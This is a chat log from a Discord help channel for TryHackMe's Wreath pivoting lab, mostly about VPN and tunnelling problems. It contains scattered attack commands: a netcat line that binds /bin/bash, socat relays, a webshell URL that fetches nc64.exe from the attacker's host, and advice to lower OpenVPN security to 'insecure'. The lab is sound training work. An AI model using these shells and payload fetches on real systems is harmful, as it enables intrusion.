
thank you @cerulean prawn
it work, successfully download VPN file

winter lintelBOT
#

Gave +1 Rep to @cerulean prawn (current: #19 - 492)

night valve
#

Currently on task 33 and trying to import the port scanning script into memory but failed, i am sure the directory exist. Anyone has the same problem before?

night valve
wooden moth
#

Hi all, anyone else get Git Lab login for task 17 on wreath network?

#

My redirect sends me here...

wooden moth
merry robin
#

I'd also be a little surprised if they were using 10.200.0.0/24 for this one, although the available subnets may have changed

wooden moth
#

I'll give it all if you would like 🙂

merry robin
#

Run ip r in your terminal and see what you get?

wooden moth
merry robin
#

Where are you getting 10.200.0.150 from?

wooden moth
#

first pivot on prod

merry robin
#

Yeah, uh, maybe don't use the DNS config to identify the subnet

wooden moth
#

I know, but it was the easiest screenshot to show you, unless you want me to show the ping sweep results. 😦

merry robin
#

Have a look at the routing on that box

merry robin
#

Or scanning generally

#

Not sure what's actually meant to be on 10.200.0.150. Guessing just a regular THM instance.

wooden moth
#

ok, I will just leave the room and follow a different network then. I have been following the instructions from the room to learn pivoting and this is the subnet that I found.

merry robin
#

Did, uh, it tell you to look at resolv.conf for your next hop?

#

It did not. Phew, thought 20 year old me might have been a bigger idiot of a teacher than I thought kekw

wooden moth
#

no worries, maybe tomorrow I will finally get a different instance. been working on this for 10 days at this point 😦 I am just very upset. It says to use nmap and gives examples based off of the room. these are the IPs I get back from. My notes are horrific (which is why I am trying to learn from this room) and I am just getting super emotional and cant think straight.

#

Ive gone up tp Task 12 twice I am just so lost right now.

merry robin
#

It's all good 🙂
Have a look at ip route on the compromised server

#

That'll show you the routing configuration for that box, including the local subnet

wooden moth
#

yes, 10.201.134.0/24

merry robin
#

There you go

#

Scan that subnet

wooden moth
#

ok, now I have 3 ips, just go from there?

merry robin
#

I'd say so, yep

wooden moth
#

thank you

wooden moth
winter lintelBOT
#

Gave +1 Rep to @merry robin (current: #10 - 822)

merry robin
#

Np 🙂

fossil karma
#

I could use a little help with getting the exploit working for the gitlab server. I've tried both curl and burp with no luck. I uploaded a standalone netcat onto the server and I know my port and listener are good, because I can revshell back to my machine. Both burp and curl time out with no response. I've noticed if I leave upgrade-insecure-request on in burp, I get TLS connection errors but I can get responses from a=whoami, a=hostname etc just fine. Can I please get some tips on what I'm doing wrong here?

Edit: In case someone is searching similar later, specifying task 20 and ip .150

fossil karma
#

I've tried restarting my machine, restarting the server, different ports, and even a different powershell rev shell. Still no luck

fossil karma
#

I can run ping on the gitserver but it doesn't seem like it can hit the prod server.

#

even more interesting, I can't ping git from prod either even though I'm connected through prod and can get git to send back hostname, whoami, etc

#

it is in the arp table though

#

works from git too

#

I can set up a webpage to download nc.exe on prod, but seems like git can't download from it. validated I can hit the web page from my machine.

#

Either the box is messed up or I'm missing something simple and probably obvious at this point.

split harbor
#

¯_(ツ)_/¯

#

you could try the reset the network option but doing so you gotta "start from scratch"

fossil karma
#

yeah, i've done that a couple times now. Even swapped my VM out just to be sure. I'm half posting here cuz it helps me think to 'say' it and my SO probably doesn't want to hear me ramble anymore lol

fossil karma
#

heck, even socat port forward doesn't work. Tried the original exploit after setting up "./socat tcp-l:16000 tcp:<MY ATTACK BOX IP>:16000 &" with no success. but running "nc 127.0.0.1 16000 -e /bin/bash" from prod connects. I'm leaning towards a network issue but confused how I can reach git server in the first place since I'm using a shuttle tunnel through prod to hit it. I think it's time for a break.

cerulean prawn
fossil karma
cerulean prawn
fossil karma
#

Where I say git server, Im referring to where I'm hitting 10.201.134.150

cerulean prawn
fossil karma
winter lintelBOT
#

Gave +1 Rep to @cerulean prawn (current: #16 - 549)

fossil karma
# cerulean prawn have you read the follow-up messages from Muiri?

I don't think that's it. looks like Witty's problem was that they weren't using 10.201.134.0/24. I'm not hitting an actual git server. I was just referring to the box by name. I'm using the exploit suggested, the php file is being uploaded, and I can run some commands. Im just not getting a response on my listener when I try to get a rev shell. It's like .200 and .150 can't actually talk to eachother even though the only reason I can hit .150 is because I've got a sshuttle tunnel through .200

fossil karma
# fossil karma works from git too

I reran the arp table check here on .150 and confirmed .200 was still listed. pings all time out when ran through the exploit.php. I can still get local info like what's in directories, user info, etc. I'd blame my tunnel, but if that were the issue then I don't think I'd be able to reach 150 at all and I know I opened the firewall port for my listener since I can reach things on that port from my attack machine.

night valve
#

Is there a reason why the git-server(.150) can scan the port of the wreath-pc(.100) while using static nmap binary on prod-server(.200) fail to scan the wreath-pc(.100)?

merry robin
merry robin
fossil karma
winter lintelBOT
#

Gave +1 Rep to @merry robin (current: #10 - 826)

unborn shell
#

not getting anything in network vpn server (Acess>network tab) no wreath nor holo

#

getting this

surreal sail
subtle kernel
surreal sail
#

ah! wreath is there for me now

subtle kernel
unborn shell
#

any idea whom do i contact for this stuff?

surreal sail
#

let me double check it

#

also note the pinned message in this discord channel by @cyan vine

#

@unborn shell are you able to use the AttackBox with it?

#

just curious if that works

unborn shell
#

attempting to start (give this popup: Uh-no! Failed to start the network.)

cerulean prawn
abstract elm
#

yeah you have to leave and rejoin the room Wreath until you find a non broken room that allows you to start the network AND download the vpn configuration file

copper hill
#

hi all, I was hoping someone may be able to point me in the right direction ref Wreath. Currently on task 20. trying to ping my device (ACK). set up sshuttle through the comp (COMP) device and can see the next device in the network (TARGET) and used the relevant exploit. I have opened up a port on the firewall but no ping seems to come through the tunnel to ACK. I can ping COMP. Am I missing something obvious?

surreal sail
#

Man

#

I can't download config file for wreath network giving me 500 error

pearl aurora
#

why the hell am i failing to join this room its not even letting me join???

sharp ice
pearl aurora
#

No

pearl aurora
sharp ice
winter lintelBOT
#

Gave +1 Rep to @sharp ice (current: #1 - 3344)

sharp ice
unborn shell
#

using netcat on pivoted system(1) throws of glibc error any alternative ways ?(socat isnt working either)

merry robin
surreal sail
#

@sharp ice i have the 7 days streak but I'm unable to download the configuration file for wreath network when i click the download button it's giving me 500 error

unborn shell
#

Followed the walkthrough and darksec video still not getting the reverse shell of 2nd machine in the network

surreal sail
#

thank

random cedar
#

I do apologise if this is the wrong place to ask but I am trying to access thomas' website and I have already mapped the IP address to the domain in my /etc/hosts file, but it keeps on timing out. I have tried to ping the site and I have gotten 100% packet loss.

#

(Do forgive me it's been a while since I have been here.)

#

I have regenerated a new OVPN file as well so it's a new connection as well and should be resolving to the correct server.

#

In essence the connection keeps timing out.

cerulean prawn
# random cedar In essence the connection keeps timing out.

use the Options button and press Leave, and then pressJoin a few minutes later: you will be assigned to a different network instance
try the pinging
if that fails regenerate the VPN file, and wait a few minutes to donwload the new config and have another go
if the above fails, repeat the process

unborn shell
random cedar
#

I haven't had a chance to try this out but I will in a moment

random cedar
winter lintelBOT
#

Gave +1 Rep to @cerulean prawn (current: #16 - 571)

random cedar
random cedar
#

I had pinged the front facing machine in the Lateral Movement and Pivoting network.

cerulean prawn
merry robin
cerulean prawn
random cedar
random cedar
cerulean prawn
# random cedar I have tried doing this as well, but I'll keep going to see what I can do

between leaving and joining, allow enough time: I would say minutes, possibly 15 (several users report different timing)
also, when regenerating VPN config files, allow 1-2 minutes before downloading; also, check the new VPN file is different from the previous one (you can simply do that by comparing their MD5 hashes)
a few comments by Muiri in Discord seem to indicate access to Wreath, is at times ... special 🙃

merry robin
#

In fairness, it always used to be fine. The underlying infrastructure seems to be... broken... though

unborn shell
#

getting this when trying to connect to the third system (using chisel and foxyproxy)
Tried
:using multiple different ports

random cedar
neat peak
#

yo guys

#

I'm unable to download my wreath network openvpn file

#

says everytime 'unknown error occured'

ocean lance
unborn shell
ocean lance
ocean lance
#

Can anyone tell me why I cannot access http://10.200.84.100 after running chisel server and client and having configured Foxyproxy?

unborn shell
unborn shell
scenic sierra
#

Good day here

#

I am not able to connect to wreath network, each time I want to download it keeps giving me an error message. Is it just me or there is something with it

#

i am not able to download the vpn file

unborn shell
scenic sierra
#

okay thank you, I will try that now

#

I did that before tho, it did not work

scenic sierra
#

i did it now and it's still the sme

#

it is not working

unborn shell
surreal sail
#

Can anyone help me? I'm having trouble downloading the Wreath Network OpenVPN file because it shows "An unknown error occurred."

unborn shell
vague mason
#

Hey, I am doing the wreath room. For that I am using my own Kali VM (latest version). I could succesfully connect to the corresponding VPN.
So I compromised the first machine but I am loosing the connection to it all the time. It just freezes for 5 - 10 minutes (due to spoiler alarm I will not tell what kind of connection i have). The corresponding IP address does not even resonds on pings in this time range. It seams that the connection freezes alway when hiting enter or tab for autocompetion. But I am not sure whether this is all the time the case. Its just a observation. Does anybody have the same issue? Thx

gloomy spruce
#

Hi guys! I have been able to compromise the first two machine i.e. webserver and gitserv. Transported the chisel script into gitserv , connected to my kali by forking through webserver using socat (binary, planted in binary). I was able to run nmap using proxychains4 to enumerate the last machine and found some open ports. But that was three weeks ago. When I started with it today, I can use chisel, socat, proxychains4 on the last pc (.100) but all the ports are responding closed. Even a reset of the network did not work. Can anyone help??

gusty mesa
#

I am having trouble connecting to the vpn. it is timing out. any ideas?

hearty moss
true lynx
#

I had a question about the wreath box in the conduct it says the part about not messing with the box for other people is this still relevant for every use of the box even solo also could i be doing the same wreath box with someone?

gusty mesa
#

The regular vpn works, just not this one.

hearty moss
hearty moss
gusty mesa
hearty moss
gusty mesa
#

@merry robin please can you give some advice. I want to work on this room.

gusty mesa
hearty moss
gusty mesa
# hearty moss Yes please?

so apparently they use a bad cipher, i checked the openvpn logs. By default openvpn newer versions don't accept it.

#

go to settings -> scroll down to advanced settings -> security level change it to insecure (-_-)

hearty moss
#

LOL. It worked

#

Thanks man

#

❤️

gusty mesa
#

@merry robin would like to hear your thoughts on this. can you update the cipher algorithm on the vpn server side. Why do we have to use insecure settings to connect?

gusty mesa
hearty moss
gusty mesa
hearty moss
gusty mesa
#

screw it bro, it's not working i'm gonna do some other room. i was really looking forward to it, but whatever

merry robin
gusty mesa
winter lintelBOT
#

Gave +1 Rep to @merry robin (current: #10 - 856)

gusty mesa
#

the room is great by the way I can't wait to work on it one day, you did a great job!

gusty mesa
vague mason
#

is anybody able to access the first machine (prod_server) ?

mighty mason
#

Has anyone used ligolo-ng on this room? I am able to get the agent onto the prod machine and connect back to my proxy. But if I run ip route add x.x.x.0/24 dev ligolo it immediately disconnects the agent and I'm unable to even reach the prod machine.

merry robin
mighty mason
# merry robin There should be an easy fix for that. First: tell me, why does it happen? Why d...

Been scratching my head on that. One guess would be something to do with the fact I already have an ip route for that subnet via x.x.86.1 over tun0 which is why I can reach "prod" to begin with so maybe the connection drops because of a conflicting (or incorrect) change in routing? But I can't reach the other two and there are no other interfaces. /24 covers all 0-255 so not sure why I wouldn't be able to. I can clearly reach them from "prod" via an nmap -sn but that doesn't happen from my kali. I've used Ligolo several times on other boxes and to double proxy so I think it isn't my ability to use the tool but rather the networking that is tripping me up. Any help is appreciated! 😄

mighty mason
winter lintelBOT
#

Gave +1 Rep to @merry robin (current: #10 - 861)

merry robin
old spindle
#

why is Wreath 45min this room is long af lol

blazing rock
pine hill
#

Help me to setup my own kali vm

#

The vpn config file is not downloading

#

I tried re generating it

flint current
#

There seems to be a network connectivity issue by connecting both methods OpenVPN and Attackbox.

marsh pike
#

Really like the wreath room and Ive been practicing it for the last few weeks and everything has been working great!
UNTIL...suddenly it stopped working correctly a few days ago.
before posting this i did a good bit of trouble shooting and searching through the discord.
Also had the room reset twice by vote and it still has the same problem.
Here is what its doing...It works for about 30secs to a min and then stops.
I can do everything normally like ping, get a shell, connect to the webpage, or run exploits...but only for about 30 seconds
Then it stops responding again for a few minutes and will come back online for another 30 seconds, etc, etc
The directories and files i created are still on the box.
Sshuttle connects and the webpage down stream can still be reached...but it crashes again and again
@royal stump Tagging you because Im not on here often and dont know who the mods are or anything.
but i see you're pretty active so i figured you might know someone can help.
Thanks

winter lintelBOT
#

Gave +1 Rep to @royal stump (current: #1 - 4469)

marsh pike
#

wow...i assumed because i was able to connect to the machine that vpn wasnt the problem.
But i regenerated as you suggested and it appears to be working again.
Learning lesson, Thanks!

keen surge
#

Having trouble reaching the initial IP, I have tried to regen my ovpn config, I can't ping or nmap scan - It was working fine until I ran Nessus against it. Could this have borked it?

granite cave
keen surge
#

Is there anyway to get it reset without the 5 votes?

granite cave
#

Not that I know of.

#

I'll vote for a reset, but IDK if we're on the same lab.

keen surge
#

ty!

left jungle
#

Ah fixed it nvm

shell rivet
#

I'm trying to download the openVPN config, but it gets stuck on "Downloading file", and after 3 minutes or so this error pops up and nothing downloads.

#

I've tried regenerating the file multiple times

#

It seems to be a backend 504 gateway timeout

dense cairn
#

did you find a fix?

granite cave
dense cairn
#

yessir

#

ive found the fix - just wait and pray

dense cairn
#

``C:\xampp\htdocs\resources\uploads>net use \10.50.66.214\share /USER:user "s3cureP@ssword"
net use \10.50.66.214\share /USER:user "s3cureP@ssword"
System error 6 has occurred.

The handle is invalid.

C:\xampp\htdocs\resources\uploads>
``

#

im having some trouble with this

#

its a smb share which wont seem to connect to the windows machine

young geyser
#

This helped me:
Please try the following:

Go to the Network room
In the top right corner, press "options" -> "leave room"
Wait for 30 minutes
Re-join the room
Once you have rejoined the network, make sure to regenerate your new configuration file by heading to https://tryhackme.com/access, selecting the network from the drop-down, and finally clicking "regenerate"

Ensure to wait up to 2 minutes before downloading your OpenVPN file!

TryHackMe

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

#

for fixing the vpn

young geyser
dense cairn
#

i just used http instead

#

ive had issues with impacket smb shares in the past

#

not enough documentation online

young geyser
#

http for shares?

dense cairn
#

its only using smb for data transferral

#

so you can just use http instead

young geyser
#

oh yeah easy

young geyser
#

is Sshuttle still works only on Linux targets?

sick harbor
#

.

#

Wreath OVPN file not downloading

Was able to download LateralMovement, and BreachingAD no issues
Tried Regenerate and still no luck
Reviewed the web request/ responses and only difference I saw was the ID ( 605a05f41789b962daf23e45 v. 62b779a82244211aa2c53453 ) and how the name of the OVPN file is appended to the username/account
Could it be an issue with CloudFlare hosting this specific file?

Tried on and off from my VPN
Tried via Kali VM
Tried via THM .ovpn in Kali

unborn shell
#

^ Try this @junior yacht

high oar
#

I can't join the room either. I tried leaving for 30 minutes, then tried regenerating & downloading, but I can't download the vpn for the Wreath network. any alternatives?

steep tapir
#

**Problem: **Been trying to use Ligolo-NG for this Wreath room and am now stuck on Task 34 to double-pivot to the .100 machine from admin user on .150 machine.

  • I also don't understand the network configuration of why .100, .150, and .200 cannot already communicate if they are all on 10.200.81.0/24 subnet.
  • Any insights or assistance is appreciated.
CMD (from Kali): listener_add --addr 0.0.0.0:7777 --to 127.0.0.1:7777 --tcp
CMD (from .150): netsh advfirewall firewall add rule name="Ligolo-r404" dir=in action=allow protocol=tcp localport=7777
CMD (from .150): .\ligolo-ng_agent_0.7.5_windows_amd64.exe -connect 10.200.81.200:7777 -ignore-cert```
Resulting Error Message:
```time="2025-06-01T19:09:33+01:00" level=error msg="Connection error: dial tcp [my-kali-ip]:7777: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond."time="2025-06-01T19:09:33+01:00" level=fatal msg="dial tcp [my-kali-ip]:7777: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond."```


--SOLVED--
- Needed to use the same port I was using on initial pivot through .200
pearl aurora
#

I am facing this problem whenever i try to run nc on the compromised machine to get back a reverse shell , i am getting this error : ./nc: /lib64/libc.so.6: version GLIBC_2.34' not found (required by ./nc). How can i solve it so that i am able to run this command and beable to get back shell when i run the powershell command on burp ?

merry robin
merry robin
#

So from a technical standpoint, the reason why they can't communicate is that there's a distributed firewall in the way.

#

From a storyline perspective it would have made more sense for them to be on different subnets

trail jungle
valid fractal
trail jungle
#

@young geyser hie 😊

trail jungle
#

hello people

#

i'm having trouble connecting the git-serv with the starkiller,........ task 27 , anyone

young geyser
trail jungle
#

yes i did all that,.............

soft loom
#

Hi all, please note that this network has now been converted to v2. V2 is THM's new network infrastructure that has improved stability and ensures that all users receive the same subnet.

If you refresh the page, you will be taken to a new network page and you may have to boot a new instance. Please make sure that you use the wreathv2 VPN profile when using the network. You can also use the tryconnectme script on the attackbox to debug your network connection

trail jungle
winter lintelBOT
#

Gave +1 Rep to @soft loom (current: #31 - 316)

blazing rock
trail jungle
trail jungle
blazing rock
trail jungle
#

now that i'm connected, i can't get this http-hop listener to work 🥺

#

on powershell empire to connect to the .150 server

trail jungle
#

oi people, i've set up a chisel forward proxyand i need to access the web of .100 ,...................how do i set up foxy proxy

ivory root
winter lintelBOT
#

Gave +1 Rep to @soft loom (current: #31 - 320)

soft loom
soft loom
# ivory root

Mmm, and you say your VPN profile works? Can you send DM me the Remote IP in your VPN profile please? I will investigate what is happening there

mossy knot
#

It's showing me join the room I have click that button multiple times but still same issue

trail jungle
#

or look on your vpn's ip address use the third octect on your vpn's ip adress and ping this ip 10.200.x.200

ivory root
winter lintelBOT
#

Gave +1 Rep to @trail jungle (current: #2997 - 1)

trail jungle
#

Hie people

high oar
#

Hey is it just me or is the option to download the wreath network VPN just gone now?

soft loom
#

Hi all, please note that we are aware of an issue with network infrastructure for wreath. We will be deploying a patch soon that will bring the wreath networks back online.

ionic kraken
#

is wreath online again???

marsh pike
ionic kraken
#

I was able to connect using the connection file called wreathv2

#

check on access via OpenVPN on networks tab there should be werathv2

marsh pike
#

Nice! I downloaded a new vpn file yesterday and it didnt work. but i generated a new one again just now and its working.

alpine cradle
soft loom
# alpine cradle It’s very unstable—only works randomly at times. I spent two days thinking the i...

Can you be a bit more specific on what issue you are facing?

The patch was deployed like 30 minutes after I sent that message, so would not affect you now.

I also havent been able to replicate stability issues from users.

The most common mistakes I see that affects stability:

  • Using ping to test access. Do not assume ICMP traffic is allowed
  • Running multiple VPN profiles at the same time. Often unintentional, but your previous run didn't actually exit, so now you have multiple VPNs running, consistently de-authing you. Use ps aux | grep openvpn and you should see a single line. If you see multiple, you are running it multiple.
  • Consistent switching between your VM and attackbox for the reason mentioned above, they use the same VPN profile
  • Losing a shell cause of a command running. Often when you try to run an interactive command in a non-interactive shell it kills it.

Some things to consider:

  • Look at the output from running the VPN profile. If every 2 minutes it reauths, it means you are running multiple VPN profiles.
  • You can ping the VPN server, since this server accepts it, which ends with .250
  • if you home/work internet is unstable, your VPN will be unstable as well. Rather use the Attackbox then, which is hosted in AWS meaning your Web view will be unstable, but not the network connection itself.

If any of the above problems, a good measure is to regen the VPN profile, which will automatically deauth all running instances. And on the AttackBox, you can run tryconnectme from terminal, which will Debug your network connection

ionic kraken
#

wreath is down for me 1 hour ago also

ionic kraken
#

Hmm I was trying tunneling with ligolo and then crashed...

soft loom
ionic kraken
#

Oh I will check that today

trail jungle
#

hie guy's ,..... i managed to connect somehow and i'm trying to set up a reverse shell in task 41 but , after following everything , the shell can't spawn for some reason ???? i don't know why any clues

ionic kraken
#

Ok so it looks like only prod-serv on wreath is active... The other machines shows as shut down even on the diagram. Please fix...

high oar
#

Hey, I'm almost done the network, but am stuck on getting a reverse shell for task 41.
My setup
I have set up a python server on port 80 (I tried 8080 too just in case) with a nc64.exe in the same directory.
I am using ligolo to set up a double pivot, but as everything else is working I'm not sure why this isn't.

The problem
In my browser I hit http://10.200.180.100/resources/uploads/shell-kalaimaranb25.jpeg.php?wreath=curl%20http://10.250.180.6:8080/nc64.exe%20-o%20c:\\windows\\temp\\nc-kalaimaranb25exe
The issue is that I see no output on my server and the file is not being uploaded. I thought it might be a connectivity issue, so I ran sudo tcpdump -i any port 80 -v to check if I was getting anything. And to my surprise, I did. I saw the http request come through. I pasted the whole output into gemini and apparently the windows machine is sending a Reset flag closing the connection.

Another thing to note is that when I try to run curl.exe (like certutil.exe), I get no output. Maybe curl isn't working? I'm really not sure what more I can do at this point. Could it be a network issue or am I doing something wrong here? Any help would be appreciated here 🙏

high oar
#

Well... I figured it out. It was because I was using ligolo-ng. There's some custom set-up that had to be done. For anyone else using ligolo, look at this site: https://www.stationx.net/how-to-use-ligolo-ng/. It's really helpful for debugging and has instructions for basically all the tasks in this network

Discover how to use Ligolo-ng and how it can make pivoting simple. Follow our guide to double pivoting, reverse shells, and secure file transfers.

alpine cradle
# soft loom Can you be a bit more specific on what issue you are facing? The patch was depl...

Thanks, currently, the main issue I am facing is intermittent TLS handshake failures causing the VPN connection to drop and restart repeatedly. I have verified that only one OpenVPN process is running, so multiple simultaneous VPN instances are not the cause.

My home network is stable, and my firewall allows UDP port 1194 and ICMP traffic. However, I have not tested from a different network yet.
I appreciate the suggestion to regenerate the VPN profile; I have done this multiple times and switched regions, but the issue persists.
It may be related to my VM environment. I would highly appreciate any guidance or approaches to diagnose the connection issue.

For testing connectivity, I primarily use nmap scans instead of ping. Typical nmap output shows:
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in X seconds

Summary of relevant log entries:
Started OpenVPN: US-West.ovpn
TLS connection initiated with 54.193.240.194:1194
Peer verified, CN=server
Assigned IP: 10.2.54.205
Routes added: 10.10.0.0/16, 10.101.0.0/16, 10.103.0.0/16
TUN device: tun0, cipher: AES-256-CBC, auth: SHA512

[14:16:08] Inactivity timeout (--ping-restart), restarting
[14:17:09] TLS handshake failed (timeout)
[14:20:31] TLS handshake failed (timeout)
[14:21:32] TLS handshake failed (timeout)
[14:22:33] TLS handshake failed (timeout)

The VPN connection failed due to a TLS key negotiation timeout, triggering a soft restart. The client successfully reconnected to the VPN server at 54.193.240.194:1194 and reinitiated a TLS handshake. Certificate verification, key usage, and extended key usage checks all passed during the reconnection.

soft loom
# alpine cradle Thanks, currently, the main issue I am facing is intermittent TLS handshake fail...

Thanks for the detailed feedback, appreciate it!

Just some more questions:

I have done this multiple times and switched regions, but the issue persists. - The VPN profile we generate here is not region specific. Just headsup. For networks, it boots a completely new VPN server, which is why you have the separate OVPN file. Just checking, but:

  • Which region are you?
  • You are not running the THM VPN AND the Network VPN at the same time right? Cause I see this: Started OpenVPN: US-West.ovpn which isn't the OVPN of the network? The network OVPN would be wreath2.ovpn
winter lintelBOT
#

Gave +1 Rep to @alpine cradle (current: #3056 - 1)

teal zinc
#

hey, is this network still working fine? wanna start it tomorrow morning and practice pivoting for the eJPTv2

high oar
#

I was able to do the whole thing. If smt crashes real bad reset the network, but I think its good

surreal sail
#

Hey everybody !

I'm currently at the beginning of the Wreath network room and i connected to the network from my kali vm using the network VPN configuration file.
The material mentions the ip of the server that is the entrypoint for the attack is at the top of the page in the network panel, but the nor the network nor host parts of that ip correspond to the network i'm on or the machines that i can see in it with an nmap scan.I just wanted to check in with you guys and make sure I wouldn't be running attacks against the wrong target or worse - as i understand this room is a shared network with other THM users - against other users machines. Have i got something configured wrong or is there an issue somewhere else ?

earnest tangle
#

Hello everyone

#

I’m trying to solve wreath room in tryhackme but it seems that after i started the machine no Running status is shown on the top left of my screen and i don’t know why.
Notice that i’m connected to the wreath vpn

#

Anyone can help with that ?

crimson sparrow
#

The wreath first machine has no ping. I almost changed anything. Recreated the VPN the VPN is working and the website says I am connected to the VPN but. I have no ping from the first machine.

cerulean prawn
crimson sparrow
#

Wait I will control

#

Version 2.6.14

#

OpenVPN

crimson sparrow
#

Should I downgrade?

cerulean prawn
# crimson sparrow Wait I will control

sorry, misunderstanding, I am referring to the VPN file you download from your access page on THM
check this previous message: #room-help message
there was a time where 2 different version of VPN files were available for Wreath, but this may have changed in the meantime

crimson sparrow
#

The last time that I done it was 2 VPN

cerulean prawn
crimson sparrow
#

I have all answers from my own notes. But I will redo it for training reasons.

cerulean prawn
crimson sparrow
#

I am not on the same network with that machine

cerulean prawn
# crimson sparrow Wreath VPN

comparing your output to mine:

  • my output
2025-09-05 08:15:03 TCP/UDP: Preserving recently used remote address: [AF_INET]34.252.51.34:1194
2025-09-05 08:15:03 Socket Buffers: R=[212992->212992] S=[212992->212992]
2025-09-05 08:15:03 UDPv4 link local: (not bound)
2025-09-05 08:15:03 UDPv4 link remote: [AF_INET]34.252.51.34:1194
  • in your output, the IP address is 52.49.253.40 , and that corresponds to the IP of the previous version of Wreath (the one before version 2)
    can you double check that there is no wreathv2 listed in your access page as per screenshot? make sure you scroll to the bottom of the drop-down list
crimson sparrow
#

It doesn't show up for me

cerulean prawn
# crimson sparrow It doesn't show up for me

leave the network again, allow for 5-10 minutes before joining again
If, after joining again, you are assigned the same network topology/same IPs, you did not wait long enough
to be on the safe side, delete browser cache and do hard refresh (Ctrl-F5)
regenerate VPN file, then download
hopefully a v2 has appeared for Wreath

crimson sparrow
#

I am now log out from THM and I reset the progress and leave the Wreath room.

cerulean prawn
crimson sparrow
cerulean prawn
crimson sparrow
#

I down have that Wreathv2

#

it dosent show up

#

Maybe I should contact the support

cerulean prawn
crimson sparrow
#

yes

#

but I am not on the same network

cerulean prawn
cerulean prawn
crimson sparrow
#

now it is comming

#

I have now the seccound vpn file

#

It show up on the website

#

thanks

#

Why this is happened ?

#

this is intresting

cerulean prawn
crimson sparrow
winter lintelBOT
#

Gave +1 Rep to @cerulean prawn (current: #13 - 762)

lethal kernel
#

hello

#

i dont have connectivity between my pc and wreath i have connected with the vpn file but i cant ping to the wreath network

cerulean prawn
turbid root
#

Hello , the openvpn file is active [2025-09-09 01:13:21 net_iface_up: set tun0 up]
but the pings arent working?
and yes im using [-wreath.ovpn]

#

[-wreathv2.ovpn] worked

lethal kernel
#

kex

hollow violet
#

good evening!

I've been trying to join Wreath network room but the button to join doesn't work. Does someone know how to fix it?

cerulean prawn
random bear
#

nvm, I found it 🙂

hoary pond
#

hey guys

#

the Wreath network seems not to have a ping and also I need -Pn to scan it with nmap, also I need nmap to guess the OS the server is running but my scans come back with no OS, it also says too many fingerprints to guess for an OS, I have tried -O, -A, none of them work, visiting the IP also does not redirect me to thomaswreath.thm

#

also, I left the room reset the progress joined again but now, there is no wreathv2 and only wreath in the access page in the networks section.

#

Oh, guys, for anyone with the same problem:

  1. reset the progress
  2. leave room
  3. wait 4 - 6 minutes
  4. join again
  5. wait 6 - 7 minutes
  6. go to access page -> networks -> select wreath v2
  7. hit regenerate
  8. download and connect to vpn
  9. ping the ip you've been given in THM
  10. if ping works, then youre golden, if not, do all of that again 1 through 10.
hollow violet
#

my .150 host isn't pinging even for the prodserver. what i have to do?

pallid basalt
#

.

hoary pond
#

Hey Guys, on the empire installlation I am supposed to run:
sudo powershell-empire server and am supposed to get an output like:

[INFO]: Submodules auto update enabled. Loading. 
[INFO]: No .git directory found. Skipping submodule fetch. 
[INFO]: Checking submodules... 
[INFO]: No .git directory found. Skipping submodule check. 
[INFO]: Using mysql database. 
[INFO]: Empire starting up... 
[INFO]: v2: Loading listener templates from: /usr/share/powershell-empire/empire/server/listeners 
[INFO]: v2: Loading stager templates from: /usr/share/powershell-empire/empire/server/stagers 
[INFO]: v2: Loading bypasses from: /usr/share/powershell-empire/empire/server/bypasses 
[INFO]: v2: Loading malleable profiles from: /usr/share/powershell-empire/empire/server/data/profiles 
[INFO]: v2: Loading modules from: /usr/share/powershell-empire/empire/server/modules 
[INFO]: Searching for plugins at /usr/share/powershell-empire/empire/server/plugins 
[INFO]: Initializing plugin: Basic Reporting 
[INFO]: Starkiller enabled. Loading. 
[INFO]: Starkiller served at the same ip and port as Empire Server 
[INFO]: Starkiller served at http://localhost:1337/ 
[INFO]: Started server process [7582] 
[INFO]: Waiting for application startup. 
[INFO]: Application startup complete. 
[INFO]: Uvicorn running on http://0.0.0.0:1337 (Press CTRL+C to quit)
server>

but I dont get the server CLI, and also, when I run :
sudo powershell-empire client I get an error:

┌──(kali㉿kali)-[~/Empire-Cli]
└─$ sudo powershell-empire client
usage: empire.py [-h] {server,setup} ...
empire.py: error: argument subparser_name: invalid choice: 'client' (choose from server, setup)

what do I do?

stable delta
#

Hi there, I'm trying to get socat working in steps 19/20 just for practice. Has anyone been successful using socat here? I keep spinning my wheels, just want to confirm it's me. Thanks!

open nebula
#

Hi There. I am not able to connect to wreath even with attack box

cerulean prawn
# open nebula

several options, but to start fresh I suggest you do the following in the order:

  • terminate THM AttackBox
  • use the Options button to leave the room
  • wait a few minutes to join the room again
  • make sure the Wreath network is running
  • start THM AttackBox
mint onyx
#

The wreath network is not working on the attack box
I already tried to reset the network, reset the room and leave the room and of course restart the attack box
But I just cant ping to 10.200.180.200
before a few weeks I remember it did worked

I tried nmap with -Pn but it return useless data so maybe it is not really up:

nmap -p-15000 -vv 10.200.180.200 -oG initial-scan -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-25 20:04 BST
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Initiating SYN Stealth Scan at 20:04
Scanning thomaswreath.thm (10.200.180.200) [15000 ports]
Nmap scan report for thomaswreath.thm (10.200.180.200)
Host is up, received user-set.
All 15000 scanned ports on thomaswreath.thm (10.200.180.200) are filtered because of 15000 no-responses

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3004.14 seconds
Raw packets sent: 30000 (1.320MB) | Rcvd: 15 (520B)

cerulean prawn
hoary pond
# open nebula

reset the progress
leave room
wait 4 - 6 minutes
join again
wait 6 - 7 minutes
go to access page -> networks -> select wreath v2
hit regenerate
download and connect to vpn
ping the ip you've been given in THM
if ping works, then youre golden, if not, do all of that again 1 through 10.

hoary pond
#

Hey guys, I just finished the wreath room, do I vote for a reset?

opal sky
#

The VPN file for wreath is so unreliable

#

sometimes it works and then 85% of the time it doesn't

cerulean prawn
opal sky
#

Yes, and sometimes that won’t even generate on the site

cerulean prawn
opal sky
#

Thanks

opal sky
#

Now it seems like most of the networks aren't showing up on THM, and I can't access hints

#

I used to use THM all the time why does it seem so buggy now

#

I'm also unable to sV scan through nmap with a proxy up? Here are some screenshots:

#

Please let me know what I'm doing wrong here

open elk
#

